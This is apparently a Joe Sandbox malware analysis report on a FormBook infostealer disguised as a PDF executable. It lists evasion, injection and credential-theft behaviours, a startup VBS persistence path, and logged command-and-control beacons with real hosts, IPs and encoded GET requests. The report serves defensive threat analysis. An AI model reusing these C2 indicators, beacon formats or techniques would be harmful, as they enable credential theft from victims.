Windows Analysis Report
5674656777985-069688574654 pdf.exe

Overview

General Information

Sample name: 5674656777985-069688574654 pdf.exe
Analysis ID: 1558148
MD5: 8e38e2141423c1bdf6899ef2aaf078f8
SHA1: ecaa7e2bd0e59981891f6ec4c34c67ee32843d2d
SHA256: ff964e11539853b46a4d4c0f9bbd111f4fdce259ef470e88ae59802d82533b36
Tags: exe, user-zn03zh

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5674656777985-069688574654 pdf.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
    • cunila.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
      • svchost.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • XzXxPWzavnqD.exe (PID: 3720 cmdline: "C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • upnpcont.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\upnpcont.exe" MD5: B0B77651795747C81A50BEFA60922B8E)
            • XzXxPWzavnqD.exe (PID: 4628 cmdline: "C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 7432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cunila.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\retrofit\cunila.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
      • svchost.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\retrofit\cunila.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 7432, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ParentImage: C:\Users\user\AppData\Local\retrofit\cunila.exe, ParentProcessId: 7308, ParentProcessName: cunila.exe, ProcessCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ProcessId: 7340, ProcessName: svchost.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 7432, ProcessName: wscript.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ParentImage: C:\Users\user\AppData\Local\retrofit\cunila.exe, ParentProcessId: 7308, ParentProcessName: cunila.exe, ProcessCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ProcessId: 7340, ProcessName: svchost.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\retrofit\cunila.exe, ProcessId: 7308, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T03:56:33.741883+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49890 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:36.651652+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49903 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:39.430836+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49914 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:48.389553+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49961 | 203.161.46.205 | 80 | TCP
2024-11-19T03:56:50.917047+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49973 | 203.161.46.205 | 80 | TCP
2024-11-19T03:56:53.471522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49985 | 203.161.46.205 | 80 | TCP
2024-11-19T03:57:02.790158+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:04.996899+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:07.534889+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:16.067744+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 104.21.15.100 | 80 | TCP
2024-11-19T03:57:18.626444+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 104.21.15.100 | 80 | TCP
2024-11-19T03:57:21.584196+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 104.21.15.100 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | ReversingLabs: Detection: 76%
Source: 5674656777985-069688574654 pdf.exe | ReversingLabs: Detection: 76%
Source: 5674656777985-069688574654 pdf.exe | Virustotal: Detection: 55%
Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Joe Sandbox ML: detected
Source: 5674656777985-069688574654 pdf.exe | Joe Sandbox ML: detected
Source: 5674656777985-069688574654 pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XzXxPWzavnqD.exe, 00000009.00000002.3082674785.00000000005FE000.00000002.00000001.01000000.00000007.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3082673027.00000000005FE000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: upnpcont.pdbGCTL source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: upnpcont.pdb source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00386CA9
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003860DD
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003863F9
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038EB60
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038F56F FindFirstFileW,FindClose,0_2_0038F56F
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038F5FA
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391B2F
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391C8A
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00391F94
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D26CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00D26CA9
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00D260DD
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00D263F9
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D2EB60
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00D2F5FA
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2F56F FindFirstFileW,FindClose,1_2_00D2F56F
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31B2F
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31C8A
Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D31F94
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49890 -> 217.160.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 217.160.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49914 -> 217.160.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49961 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 91.226.30.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 104.21.15.100:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 104.21.15.100:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 91.226.30.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 91.226.30.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 104.21.15.100:80
Source: Joe Sandbox View | IP Address: 103.21.221.4
Source: Joe Sandbox View | IP Address: 203.161.46.205
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00394EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00394EB5
Source: global traffic | HTTP traffic detected: GET /5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= HTTP/1.1
    Host: www.tempatmudisini06.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d HTTP/1.1
    Host: www.carsten.studio
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d HTTP/1.1
    Host: www.moumore.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d HTTP/1.1
    Host: www.vpnto.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.tempatmudisini06.click
Source: global traffic | DNS traffic detected: DNS query: www.carsten.studio
Source: global traffic | DNS traffic detected: DNS query: www.moumore.top
Source: global traffic | DNS traffic detected: DNS query: www.vpnto.net
Source: global traffic | DNS traffic detected: DNS query: www.sitioseguro.blog
